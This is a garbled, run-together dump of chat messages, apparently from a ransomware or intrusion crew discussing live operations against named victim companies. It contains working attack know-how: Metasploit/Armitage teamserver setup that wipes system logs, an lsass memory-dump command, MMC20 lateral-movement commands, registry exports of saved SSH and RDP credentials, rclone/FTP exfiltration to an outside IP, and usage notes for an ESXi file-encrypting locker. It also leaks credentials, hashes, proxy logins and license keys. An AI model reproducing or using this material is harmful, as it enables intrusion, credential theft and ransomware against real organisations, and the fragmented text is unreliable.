corp-m\d_mg1201aa 22e?27%mQ1uta_mg1022mp Killer1986))))elefantkalinka and data all there and add me there add a new channel create there how to transfer@alex transfer to the new rocket on the second 44 days)10 days time of the computer watched?Although the koba not cleaned, but I want to note that the sessions are still dying in memory at night, after about 10-12 hours after creating a sessionjaskask * @alter please add jas tomorrow I will ask you to ... it should be time ... and cleaning will be? so dirty just downloaded myself artkit11mar.7z
put it in the scripts and generated it...
i just downloaded artkit11mar 7 z i prescribed it in the scripts and generated it... Windowsfed yelled and deleted it right away... i couldn't even run it if i recently updated it, but the StartW[ ](https://stylebrooks.com/group/cobalt_v42_patched?msg=k7wggjWn2SLtdqWfy) function is the same. how do you run this ddla remotely if it fails with one function and the other one fails?if you have a session as you write it flies and alive, the problem is where? is there magic in it? and why run the dll from the desktop? write the full path to the dllproblem is that with one function flies and another dies? the same... just rolls out the window with an error
error in dll.dll
missing entry: Control_RunDLLwhat kind of error is this if the session comes alive?) tryStartWhen you run the dll, the error flies out
error in dll.dll
missing entry: DllInstall - session arrives, but is dead instantly
missing entry: Control_RunDLL - session arrives alive :thumbsup:hey, if you have any problems with rising the ccsf session - welcome, there is a solution@all
cvmkfDe6Zh7tkWyKwljr2Z80cWSzWSHFTCxPd9OKFgvJsHhVxTdwaTgOd1EUJy12
whose? @all
cwf.fr
d-box.com
groupemontoni.com
owners of these cases - waiting for you@all
unionleader.com
thestaffzone.net
owners of these cases, please let me know how do you download them? do you download them as a packaged archive or just as a diru?
i can explain how to download from msfvenom and use it without tunneling through cobb who can explain how to make a session in msf without vpn-good manualls:thumbsup
i will test@red probably installed it the other way around, but not for sure on Ubuntu it all works yeah, it's better to install the current version@red here i foresee a problem ``apt-get install default-jdk
I showed you above how to set the TC for root, but I don't want to run the timeserver only as a user, here's my guide
1. Install the metasplot
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
; ./msfconsole run the metasplot
2. Install Postgresql
apt-get -y install postgresql
3. Installing Armitage
wget http://fastandeasyhacking.com/download/armitage150813.tgz
tar zxvf armitage150813.tgz
Initialize the metasplot base
msfdb init
; msfdb reinit - Deletes and reinitializes the database.
; msfdb delete - Deletes the database.
; msfdb start - Starts the database.
; msfdb stop - Stops the database.
; msfdb status - Shows the database status.
export MSF_DATABASE_CONFIG=/home/%username%/.msf4/database.yml
5. Launch Armitage Teamserver
cd /path/to/armitage
./teamserver [external IP address] [password]
Useful Links
Installing the Metasploit Framework -
https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/
Armitage installation -
http://www.fastandeasyhacking.com/manual
Required Packages
``````
1. take debian or ubuntu dedic (ssh username@hostname)
Check availability of postgresql
sudo apt install postgresql
sudo apt-get -y install postgresql
============================================================================================================================
2. Download and install the metasplot
x64
wget http://downloads.metasploit.com/data/releases/archive/metasploit-4.16.2-2020011301-linux-x64-installer.run
Next, we modify (allow the scripts to run)
chmod +x metasploit-4.16.2-2020011301-linux-x64-installer.run
chmod +x metasploit-4.13.0-2017022101-linux-x64-installer.run
Далее установка ./metasploit-4.16.2-2020011301-linux-x64-installer.run
https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
============================================================================================================================
Leave all default ports and add a random local domain
domain like addada.com
============================================================================================================================
4. After installing the msf
Installing the editor
sudo apt install nano
Editing scripts 1
nano /etc/init.d/metasploit
#exec /opt/metasploit/ctlscript.sh "$@"
exec /opt/metasploit/postgresql/scripts/ctl.sh "$@"
Editing scripts 2
nano /etc/rc.local add these lines before exit 0
ln -sf /dev/null /var/log/wtmp
ln -sf /dev/null /var/run/utmp
ln -sf /dev/null /var/log/lastlog
ln -sf /dev/null /var/log/auth.log
ln -sf /dev/null /var/log/btmp
ln -sf /dev/null /var/log/dmesg
ln -sf /dev/null /var/log/faillog
ln -sf /dev/null /var/log/kern.log
ln -sf /dev/null /var/log/syslog
ln -sf /dev/null /var/log/user.log
ln -sf /dev/null /var/log/secure
ln -sf /dev/null /root/.bash_history
iptables -A INPUT -i eth0 -p tcp -m tcp --dport 3790 -j DROP
============================================================================================================================
5. Set the java to make the armitage work
apt-get update && apt-get upgrade
apt-get install default-jdk
============================================================================================================================
6. Download and unpack the armitge (toolserver) from this url (tgz archive is up to date)
wget http://fastandeasyhacking.com/download/armitage150813.tgz
tar zxvf armitage150813.tgz
============================================================================================================================
7. Change the port in armitage (before running) in the teamserver script near the end of the file
nano armitage/teamserver
============================================================================================================================
8. Open screen (so that you can run armitage in the background and exit the server), and run
apt-get install screen
launch the screen
cd /root/armitage && ./teamserver IP PASS (the IP of the external interface of the dedicates and the pass is more complex)
============================================================================================================================
9. Wait until everything starts and a message appears with the credentials to armitage, and exit the screen with Ctrl+a and then separately d
============================================================================================================================
10. Change SSH password (passwd root ...)
============================================================================================================================
11. (change ssh port / make authorization by key to the server)
nano /etc/ssh/sshd_config
============================================================================================================================
``mkdir /opt/
cd /opt/
wget https://github.com/rapid7/metasploit-framework/archive/4.16.37.zip
unzip 4.16.37.zip
mv metasploit-framework-4.16.37 metasploit-framework
sudo chown -R `whoami` /opt/metasploit-framework
cd /opt/metasploit-framework
gem install bundler
bundle install
cd /opt/metasploit-framework
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'@atom easily if msf is properly installed
Help me raise the timserver from a normal position. you need a manual on how to raise the timserver, including this manual? but there is a problem with rights, I have not solved it in my own place. armitage guide ``http://www.fastandeasyhacking.com/manual
For 3 years now everyone has been writing on forums about this error with bundler and hems, which is why the java won't connect to you$ gem install bundler
I'll delete it later so it won't clog up the ether with this script
```
This tutorial is for Ubuntu.
the first thing we do is install nano, screen, unzip
sudo apt-get install nano screen unzip
Next, create file 1.sh:
nano 1.sh
Then insert the code block:
1. installing java (1.sh)
Code:
sudo apt-get update
sudo apt-get -y install --reinstall software-properties-common
sudo apt-get install default-jre
sudo apt-get update
sudo apt-get -y --force-yes install git build-essential unzip libreadline-dev zlib1g-dev nano screen libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev
sudo apt-get update
sudo apt-get upgrade
cd ~
git clone git://github.com/sstephenson/rbenv.git
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL
then CTRL+X (save) press Y ENTER ENTER
repeat the same for each item
set the rights:
chmod +x 1.sh
run 1.sh:
./1.sh
Now each command is executed in turn
2. installing ruby (2.sh)
Code:
git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL
3. installing ruby (3.sh)
Code:
RUBYVERSION=2.4.3
rbenv install $RUBYVERSION
rbenv global $RUBYVERSION
ruby -v
4. installing nmap (4.sh)
Code:
mkdir ~/Development
cd ~/Development
git clone https://github.com/nmap/nmap.git
cd nmap
./configure
make
sudo make install
make clean
5. create a database and a database user. execute the commands in turn (without. nano):
Code:
su postgres
cd
createuser msf -P -S -R -D
#enter password qwe31337
createdb -O msf msf
exit
6. installing msf (5.sh)
Code:
mkdir /opt/
cd /opt/
wget https://github.com/rapid7/metasploit-framework/archive/4.16.37.zip
unzip 4.16.37.zip
mv metasploit-framework-4.16.37 metasploit-framework
sudo chown -R `whoami` /opt/metasploit-framework
cd /opt/metasploit-framework
gem install bundler
bundle install
cd /opt/metasploit-framework
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
7. installing armitage (6.sh)
Code:
echo cHJvZHVjdGlvbjoNCiBhZGFwdGVyOiBwb3N0Z3Jlc3FsDQogZGF0YWJhc2U6IG1zZg0KIHVzZXJuYW1lOiBtc2YNCiBwYXNzd29yZDogcXdlMzEzMzcNCiBob3N0OiAxMjcuMC4wLjENCiBwb3J0OiA1NDMyDQogcG9vbDogNzUNCiB0aW1Lb3V0OiA1DQo=|base64 --decode > /opt/metasploit-framework/config/database.yml
cd /opt/
curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage150813.tgz
sudo tar -xvzf /tmp/armitage.tgz -C /opt
sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage
sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver
sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"
sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver
After installation, create a screen (to run in the background):
screen -dmS arm
screen -x arm
cd /opt/armitage/
Run ifconfig to check your IP
./teamserver TUT_API_WDSKI TUT_PASSWORD
``You're not clinging to it,`` for some reason your msf is crashing.
[*] Metasploit requires the Bundler gem to be installed
$ gem install bundler
``I don't even know how to comment on this, does it work? Has anyone encountered this error when starting armitage?
[*] Starting RPC daemon
[*] Metasploit requires the Bundler gem to be installed
$ gem install bundler
[*] Sleeping for 20s (to let msfrpcd initialize)
[*] Starting Armitage team server
[*] Warning: checkError(): java.lang.RuntimeException: java.net.ConnectException: Connection refused (Connection refused) at server.sl:450schali it is,yes it puts both armagh and msf on BOX and msf should be on REMOTE BOXhttp://github.com/Matt-London/Install-Armitage-on-Linux what mushrooms are you eating?)))) it does not even need to install) and runs)) 100%armitage simply download) on the site armitage in the instructions are its installationa you armitage or a team serv? no, armitage is not through apt-get installed, and with a guitar if you do not care about the same download, there is armitage `` ``
sudo apt-get install armitage -y
cd Armitage
sudo pip3 install -r requirements.txt
sudo python3 armitage.py
```
like this on ubuntu for example koroche@slice have a suspiciona)most likely he meant the guide script for what? you can write a script yourself install it on wps? a few guys who works with armitage? ms17 - smb port
kerba - ldapfwd and without sox will work you need to throw portsox5 from polzak who started in the local area? very necessary, polzak context, crowdedstrike, 1 yes, you need at least ms17\kerbu\adfind. edr all jammed all ok) what are these numbers?@graf @slice thanksspro key I know about 5 years ago, it was so-so, now I'll try another activation key and cost 10 - 20 dollarsautokms in virustotal vgoniana any other than crack?) trust me a little too little to nimavtokms?:sweat_smile:except directly to activate))) who knows a working way to remove the activation banner windows? @red downloads may not work if the default address assigned to a domain from the Web, and he originally came through tornashel)-@red on the direct - probably because of e2e, disable it in the settings. How do I get the settings to work properly with downloads? Do not work direct-message, ie person writing in direct, he sees the notebook, but when you open the message is not, too, I'm interested in settings such as where and what to prescribe a servak[ ](https://stylebrooks.com/group/general?msg=Lo2gQrxif7BDytsLt) And this is from the corporation picked up, often found such charts, format ` `.vsdx ` ` and opened through VISIO ` Hey, and you yourself draw a diagram or is there any program? who is online
urgently!acunetix have you got a working one? sorry guys)understood on the "whole forest" it will only go with the wrong settings for the active directory for which you generatebecause it contains a specific domain sidgolden ticket works only in your domain's neprelekh can someone advise on kerberos::golden
created taqet, how now to connect them to the trust host? i will also take a) but later tonight will be) +1there is an urgent need to work@all have hands free? access flew fresh try to remove the backslash from the login, it escapes from this amputation
```
FC944FD5-6FA6-491F-B3AE-055AA04B8DE8 CASTCORP\Veeam_Admin AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAB44Kw95xZkO6FxCbmQL9XgQAAAACAAAAAAAQZgAAAAEAACAAAAB/fgYimujV08FFVF1HorEMrAbTeP2+007aEVdbUJiq4AAAAAAOgAAAAAIAACAAAAD2X4IEl9UCIkgoq8dV54rX4hc68kJixNPGsZ7ED/SOnSAAAAA7Qhz+33PcMmQaeTlpX8v8TbVrJ4fiHKETkUapmrm3o0AAAADfmyWgvy7k7xVlID5kiZ099vxskNC1MrgIsxxzHeZpSLfA4C/1Sem886hEIuJ5cai/6wRJ/1NzB1A9iBxEP380 21857372 2015-11 Veeam_Admin 1 2020-07-29 15:26:43.573
```
I leave only
```
Decrypt("CASTCORP\Veeam_Admin. AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAB44Kw95xZkO6FxCbmQL9XgQAAAACAAAAAAAQZgAAAAEAACAAAAB/fgYimujV08FFVF1HorEMrAbTeP2+007aEVdbUJiq4AAAAAAOgAAAAAIAACAAAAD2X4IEl9UCIkgoq8dV54rX4hc68kJixNPGsZ7ED/SOnSAAAAA7Qhz+33PcMmQaeTlpX8v8TbVrJ4fiHKETkUapmrm3o0AAAADfmyWgvy7k7xVlID5kiZ099vxskNC1MrgIsxxzHeZpSLfA4C/1Sem886hEIuJ5cai/6wRJ/1NzB1A9iBxEP380=");
why is csc.exe veeam.cs not working?
sql manament let's try either raise cobalt session and style token sklservsql manament studio poke the owner of your process "can't" in the subdialog from the context of an untrusted processwho had such an error when decrypting viam ?
```
Msg 916, Level 14, State 1, Server FRVEEAM02\VEEAMSQL2016, Line 1
The server principal "CASTCORP\CASTCJA" is unable to access the database "VeeamBackup" under the current security context.
Ookchutka late) off already Citrix) will be tomorrow) well, let's take it - see what there may be and rdp
there may be an opportunity to call citrix@alter there are cmd or rdp? @all there are willing to take citrixes to work thick? @all sicaf-cosmetiques.fr
I don't see any @alter hallite.com if it's ours) there's a bouncer there, are there any files from it@all hilite.com ? someone had it in work but bouncerfrance.fr - similarly looking for@all sicaf-cosmetiques.fr who has it ?
the link to exh sploittyp hashm auto-select or 256 I do not remember already can be determined by fucking a bunch in kmd5) looks like cha256akoy hash that should be on kmd5 in my opinion there hash cha512 like@alter ++++ someone knows how to decrypt passwords sonic?anyone can check if malwarebytes stalls on dinchek? +++++@all are there any fresh sonicdumpers no one has? by the way, no one has ever used wyrdguard+shadowsox? i wonder if vireguard is picking up in packages i just don't want to bother with it, i just did it quickly and moved on (when i have a virtual desktop with kali where it was already standing) no problem) the cat works under macAha and came to it, i wanted to fast from mac, i ended up using kali through thorns to the stars as i always do) i ditched it yesterday with johonin and never dumped kipass) and if kipass?i usually dump via the task manager,or mimicatu who has a compiled lsas dumper? guys who met this error in the installation of JohnTheRipper
/usr/bin/ld: cannot find -lz
collect2: error: ld returned 1 exit status
make: *** [Makefile:1409: generic.h] Error 1@all
```
zCgwK2oXPvi3xkfs9TT4UVLcjvtW24j8PPlrLpOQuWcOkzQ5he9dKzk0Vjd4Vu
```
whose ``?
L24K!/3vTUft "*hQ^'A4
```
Download: https://qaz.im/load/iHynR4/sQkakd
fortivepn-brother, try who works with forts now if everything is ok+@all
https://labs.f-secure.com/tools/c3/vip72спасибо guys !``https://5socks.net/en_index.htm ``depending on what purpose to take proxies,you can also buy on white sites at proxy6 for example in lux have accessparni, need proxies to buy, but here I do not know where better, advised ``luxsocksruq3olxa.onion` `` here look, but there is too expensive - $ 500 just for the entrance ticket. Tip a couple of options, pleaseThere is no access, even if you try to spam a new session from YES
I need a token, but something prevents me from doing it, guys, has anyone run into this?
[-] could not spawn C:\WINDOWS\system32\cmd.exe /C dir \\10.128.200.208\c$\programdata (token): 5
I'm not sure what's going on... I can't read the profile itself, I can't form it, there are guides available... i can't download files, no slips, no response, put a slip, then the file browser or downlaid files takes the slip and the session falls off for at least 2 3 minutes to 15 20 minutes, without smallable profiles seemed normal, will someone deal with this glitch because of profiles or because of weak VPN where koba runs? i got the profiles from git, maybe they need to configure, i do not know what to do there, thank you, alter asked to write to who is available to teammates, i have not done anything yet lokera lokera lokera lokera version? for lnx and ecys? preferably with pictures... because the language is a pain in the ass@all has anyone ever made a data backup from microsoft 365 from a browser? is there a manual without any software?super)weighs 70 kilobytes can work from memory i'll give you soon a rewritten copy of rklonablit the fucking coding yes soon ereisa rko support, in monitoring it makes no difference what you downloadWe always use rklon, got busted because of it 1 time and this moment was only because the threads were full, they had a network down... So we are safely pumping, but now the same as with fly the error occurs on the last case... We are trying to solve it. Before that everything was working fine and downloading. And the difference between filesilla with limited speed and pklon with limited speed seems to me not special. If the administrator is normal in the network, he and it will see, at least what kind of software, and if not monitor the network, it does not matter what software to download and without speed limits. My personal judgement) Hi.
Try another tool, filesilla banal.
We are in a few cases where we got burned, sin on rklon.
Filezilla is portable to an unused server, limit speed, run it from an unused user, minimize it to tray.Guys, here's the problem, RCLONE doesn't work. It's uploading to ftp. There is a connection to the FTP and directly pinged. Changed ports and users, hosts and dialers. Fuck no. Doesn't work with local or remote hosts.
I get this error:
``2021/04/21 20:37:39 ERROR : ftp://45.137.190.251:21/123: Error while Dialing 45.
137.190.251:21: dial tcp 45.137.190.251:21: connectex: A connection attempt failed
ed because the connected party did not properly respond after a period of time,
or established connection failed because connected host has failed to respond.
2021/04/21 20:37:39 Failed to create file system for "system:123": NewFs: ftpCon
nection Dial: dial tcp 45.137.190.251:21: connectex: A connection attempt failed
because the connected party did not properly respond after a period of time, or
established connection failed because connected host has failed to respond.``
In other networks everything works, double-checked 10 times.https://www.pdf2go.com/ru
french from a PNG picture is fine in text, but so far I found one option... make a printscreen, cut off the name of the company in Paint and fill it in as it is, they are all fucking crooked.Can you suggest offline editors of pdf files, to pull the text from a scanned document.
i can't upload to googledocs and the like since almost every scan has the name of the company on it, that's why i was surprised
there seems to be some bug of the cp was, before this run through the console was an error, then tried through the graphical interface - everything is even[ ](https://stylebrooks.com/group/discussion?msg=hTSKWcujXQ2RQfZoS) but the session from the system or another user ?reset the current token first ``$krb5tgs$23$*14082020Yuri__sqlservice$VTAORTHO.com$MSSQLSvc/VOGDBN02.VTAORTHO.com:1433*$:ventura600650
```$krb5tgs$23$*14082020Yuri__sqlservice$VTAORTHO.com$MSSQLSvc/VOGDBN02.VTAORTHO.com:1433*$:ventura600650+++VasyaPypkin+))+))no, who is "here" I see))) no questions to you)))) here we are here)let's keep to the schedule still, otherwise we will get bogged down in long cashes)gentlemen, 15 hours, and where everyone? = )airsronon got it, sorry expansion zagulutak what is it? have a value? and the title is not clear just go there ?.CSR - what is the file? https://github.com/pandasec888/taowu-cobalt-strike/tree/englishнажми there is a version of it there are good chinese, first the palm, now this one pulls where the other does not pulla clear scriptchrome ff edge
there's a lot of stuffhttp://github.com/pandasec888/taowu-cobalt-strike found the solution in the aggressor script now I'll tell you what kind of browser by the way+hey guys!
who can help me crypt the eczeshnik, please give me a plus sign or knock in pm)
thankshttp://gist.github.com/HarmJ0y/dc379107cfb4aa7ef5c3ecbac0133a02 there's a chance that I myself will not build)never had to export passes from therewhen build - tell me =) https://github.com/GhostPack/SharpDPAPIhttps://blog.elcomsoft.com/2020/04/extracting-passwords-from-microsoft-edge-chromium/есть some kind of program which gets passes from the Edge like sharkhrom? Fury ``before lock check list of vm on esxi, not to be mistaken, you can (esxi shell command)
vim-cmd vmsvc/getallvms``````
Unix version startup options
--path
If this parameter is used, the locker will encrypt files at the specified path. This parameter is obligatory, without it the locker won't encrypt anything.
./encryptor --path /path
--prockiller
Kills all processes which interfere with opening files.
./encryptor --path /path --prockiller
--log
Enables logging of all actions and errors
./encryptor --path /path --log /root/log.txt
--vmkiller(For esxi only)
Turns off all virtual machines
--vmlist(For esxi only)
Sets a file with a list of virtual machines that should not be shut down. One line for each VM
./encryptor --path /path --vmkiller --vmlist /tmp/list.txt
--detach
Disconnects the process from the terminal.
So that if an ssh session crashes, the locker will keep working
And the files won't get corrupted.
ESXi version SHOULD BE REQUIRED separately
If it doesn't start somewhere, I need os, kernel version and glibc version
/lib64/libc.so.6
``webroot stalls the dllinject under cobalt
does the balloon pan? has anyone tested it in the last 2-4 weeks? yeah ok give me the full composition of hell from here
kennethgevansecj_yah
PASSWORD
e9a2c5574445.91.11.22:300012.56.115.39:3000145.91.11.22:30001
LOGIN
kennethgevansecj_yah
PASSWORD
e9a2c55744
TYPE
HTTP(S)
AUTHORIZATION
by login/password62.96.194.146\\10.153.96.27\e$\MG-Mixedmayfair-grp\d_mg1201aa 22e?27%mQ1ut
corp-m\d_mg1201aa 22e?27%mQ1uta_mg1022mp Killer1986))))друзья
Who can share how to make a link to the coba (for phishing emails) on the wind easier to use the link above, which I threw the technologist, but with linux, I personally dances with tambourine onlipoka left this venture, will now archive and through the coba to pump out if rdp not allowed to use and so tried and different clients, because I was worried about remmina-try it both ways
i had a similar network and it was running fine, i don't know why i can't use it from the car where you connected to ipac or hostname, you don't need to use socket in general if you are connected to ipac, i don't need to use pinging but i checked port 3389 from harp
[+] 10.0.1.29: - 10.0.1.29:3389 - TCP OPEN
so packets get through
i have a good connection to proxychains and i don't know how to use proxies on this machine but i am not sure if it is right, i am asking you to correct it, are the proxies valid and is the proxies on it?i got it, he is connected to the local loop, and if you use a proxy through the cobs, it's like you are already in the local loop ok, i will try it outhz what could be the problem with analogueswas exactly the same problem recently, solved only with the help of a native rddmstsc also tried ((i had such a problem, neither hrdp, not remina, not freerdp did not want to connect, try to connect through a regular rdp which is on the wind, and proxy through profixier, it should connectProbably it is not only on this server on several others the same situationproblem with connection through the rdp?what the problem could be ?
help to understand, i was going to download information today, the situation is as follows:
[+] 10.0.1.29: - 10.0.1.29:3389 - TCP OPEN
port open
[+] 10.0.1.29:445 - 10.0.1.29:445 - Success: 'ppmhc\2572cc:Bigdaddy2' Administrator
smb login
I can't log on to the host using remmina, when I try to log on I get a certificate, but nothing beyond the certificate
a few lines of proxychains output
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - [length=16]
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - MsvAvTargetName AvId: 9 AvLen: 3663300576
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - 0000 54 00 45 00 52 00 4d 00 53 00 52 00 56 00 2f 00 T.E.R.M.S.R.V./.
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - 0016 31 00 30 00 2e 00 30 00 2e 00 31 00 2e 00 37 00 1.0...0...1...7.
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - 0032 37 00 7.
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - [length=34]
[10:59:13:037] [85132:87227] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
libfreerdp returned code is 00000000cm confueto alfaraa. i've already raised the rights here...context give it yourEHe's not mashing at all. delete rename, set the rights - no way. citrix > LPE trying to poke around
charpAp gave this up:what would the log be clear of the sessionis there a command to clear the console of the bicon specifically? let me try it,this is all about the remote machine,right? dump and drag...you can do tasklist on the machine, find out the PID of the process there and so in the lsass NTLM hash + mb cleartext pass + hashdump analog you can do this then mimic read624 - PID lsassa for example you can ``rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full
``the analogue of the command logonpasswordsProtect the mimic in the offline in your own place Can you just dump the lsass? tokens ideally What do you want to find on these PCs What's the purpose? tried AV eats them up so tried this methoddll ehe throw it there yes there are Detects if you can build - you already built, it seems there is an internet?there is a caveat that there are five hosts where there are the craps on 3 it jumps on a simple jumper but to two not although smb login shows okv1.0/Pourchell.exe - is it there? and also show the full command I'm afraid it will stalify kaspersky like aaver what is it on the machines where you want to jumper? hiSalut can someone check if the command is written correctly
``powershell [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.1.6.7")) .Document.ActiveView.ExecuteShellCommand("C:\windows\system32\windowspowershell\v1.0\powershell.exe", $null, `` then I insert the code generated by the code ``.
then i get error : could not spawn (token): 87
run net helpmsg 87
[*] Tasked beacon to run: net helpmsg 87
[+] host called home, sent: 32 bytes
[+] received output:
The parameter is incorrect.
Question:
Is it inserted as an argument? How should I close it ? with double quotes or without ? Or is there something else I'm missing ?
This method of jumping to a neighboring host (with the disclaimer that classic jumps don't work there)
is described in this article:
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
If you do not know how to jump to a neighboring host, it is possible to jump to a neighboring host using this method. there if you get up to the system, you can run responder\inwade and fiddle with network hasheshere vorkgrupp machines were as in the local oneweb scanner run and through sockets to 80 443 8080 8443 portshttp://github.com/NetSPI/PowerUpSQLeshe mssql remout attack look at https://github.com/Ridter/cve-2020-0688schevspomniloda, ms17 all scannedsmart auto burente can tryms17 no sense to repeat? Salud guys. Here's a question. Share what script someone uses if the session from the network with a user who has privileges little more than the "printer". Immediately stating that the standard methods are tried, no tokens, siattbelt, does not work as well as any other command "execute-assembly" (Failed to load the assembly w/hr 0x8007000b) ball where to move this user too no. Access to the system folders is closed. In the process from the system inject too can not do. In general, I am interested in what you do in such cases. The question is of a general nature, such here is the "hard cases" as the second is not budetotpisyat here is not necessary
Gentlemen #teamleaders let those who understand badly the first time I really hope that it will be understood and taken@all gentlemen, friends and colleagues
I'm sick and tired of being a fucking babysitter for everyone
specifically here is a very detailed report and the result of the downloaded data which WE all need for the trades to get the most out of the work
the next group that will ignore it in itself will choose responsible person who will be punished with a ruble or forever excluded from the work process, everyone has a nerve - I have a lot, but I also have a limit of certainprincelunaATXBugsambaasdf7f814vycfas is anyone msf at hand where armitage can be legitimate? GruzuPars hi, please send, who has a video Fast Guide + textbook from there[ ](https://stylebrooks.com/group/general?msg=Rk5cnaLJFZKrSRNAY) if this NTLM LM hash then cmd5.org
cheeks in lichkene for what thanks, man)@VasyaPypkin F22F154A1307A6D7C523E55BAB861365 Locmis2003 guys have any power? need a script F22F154A1307A6D7C523E55BAB861365privet myself almost no work sitting, puzzle me?almost no business yourself? you got something for me? hello@hitech hereATXBugsambaasdf7f814vycfas the first two +- junk, just convenient, look at the third imhomskl !=muscle
we have to try and find his computer and he may have the craps somewhere
either in the balloons or in the DEV zones haven't found them yet but on the desktop and in the password manager everything will be fine + take over the computer of the SL developer / sys admin is not a problem right? it's worth a look in the configure applications to see if there is a DB / hostname you want to connect to in the admin_computer. if not then ... ugly linux creds != creds to the database and musl kmd under the current context not found you can account YES module in msf mysqql_ѕql if you already have the rights raised soPowerUpSql the most buzzing talkkit to work with whineshttp://github.com/FortyNorthSecurity/SqlClient
https://github.com/uknowsec/SharpSQLTools
https://github.com/NetSPI/PowerUpSQL - !!!!!!
right in the cob - nofat32039482753QQ I already went to the admin he sleeps at nightdon't want to complicated I don't want to removed you about the MCF, what about the chromataova - I tried it was the same as what?module to remove the session on the msf not throw achet drizzling) ok at night I'll go directly) there will be a log is not fat will be da space I think it is unlikely or not there is no space ... change 2 to 10 ``ERROR: Unable to write to the file. There may be a disk or file system error.
File C:\ProgramData\AppBkUp2.reg already exists. Overwrite (Yes/No)?
{`Diroux changed``ERROR: Unable to write to the file. There may be a disk or file system error.
The operation completed successfully.
The operation completed successfully.
If not, just go to the night I'll report the results I have not reached the logger yet if very necessary dll eh I can find it I have not used in kobalt there is a keylogger I think I'll run it I'll report and that's all I can do with them i have keyloggerstyler can be a linux conquestBro all on mazia kipass some nyetyuoswatchesharyyouwould chrome inspected and needY) from kontex useagada and kredy will go) he where he keeps a passHow to run the script and all?i don't know how to get the session and the credits from the patti, what's the problem? is there a session with the procs or not? do you have a cobalt dll or will it get annoying?
[+] Determining what AntiVirus is installed...
[+] host called home, sent: 267422 bytes
[+] received output:
PID|Name|Path
Windows Defender AV Signature Version:
1.259.1455.0
AV Name|Version|Install Date
[+] received output:
displayName : Trend Micro Apex One Antivirus
pathToSignedReportingExe : C:\Program Files (x86)\Trend Micro\Security Agent\TmListen.exe
Timestamp : Tue, 15 Sep 2020 15:31:55 GMT
displayName : Windows Defender
pathToSignedReportingExe : %ProgramFiles%\Windows Defender\MsMpeng.exe
timestamp : Mon, 15 Jan 2018 22:15:39 GMT
``Which one is it?'' I'll write to you via invoke the hash thank you I'll try to fuck with the context of the user but I'm not sure if that's it or not I have it written down
@echo off
REG EXPORT "HKEY_CURRENT_USER\Software\SimonTatham" "C:\ProgramData\AppBkUp1.reg"
REG EXPORT "HKEY_CURRENT_USER/Software/Martin Prikryl" "C:ProgramDataAppBkUp2.reg"
REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client" "C:\ProgramData\AppBkUp3.reg"
``````putty HKCU\Software\SimonTatham\PuTTY\Sessions
recursive search for *.ppk up to 3rd level in
%USERPROFILE%\Documents
%USERPROFILE%\.ssh
%USERPROFILE%\Downloads
HKCU\Software\SimonTatham\PuTTY\Sessions
``Scha sekreds pomoymu pomoymu wyść registryPutty is zhutocni aver whatdr_qenuPutty at the admin is open and he authorizajte komputer admin - there putty. All searched - no credits. In MSF session does not come - cut AB ( wanted through MSF with putty to work)
Question - do we have any solutions to get the credits from the putty? Stiller or something else? a couple of new tricks can be foundmikecook thanks, I will look at examples to portscan cobalt, an error in syntax probably add ` ``icmp 1024
``Hi all!
beacon> portscan 192.168.0.0/24 445
[*] Tasked beacon to scan ports 445 on 192.168.0.0/24
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
Why can this happen? The scan is finished at once
the range is exactly the same on the forum at once) the service stack of DB processes etc.
For loca mauntom if suddenly :) well freshcdll under on def works from under kmd (without cobalt)
likely there is a client outluk, preferably not trial? there seems to be, but it's like putting in the trash and there is no simple option to delete? cloud backups on viam who tried to crush? account got. and how to delete? overwrite want to try but mb have an alternative? threw keys, all activated, cp) ``PLZ92-LYS8J-ANV3S-SZRQ7-GPG3F
5JZ6S-B3FKJ-49YYP-HCCQN-3JVHX
TQZVQ-X36SC-SFZYC-TAC7E-BQF9S
2VZ8M-BYC2A-A3Y3P-6LQQ5-HNDN8
CJZXN-BWFDK-Q2Y2M-VSFCT-E7YLW
6KZ2V-A2UXK-YAWWC-YJ9QG-MW4RG
RSZXG-M2YDB-R5SWQ-3XR7Z-L42PN
ULZCW-2YQNG-FL83G-9DGLR-9TFQA
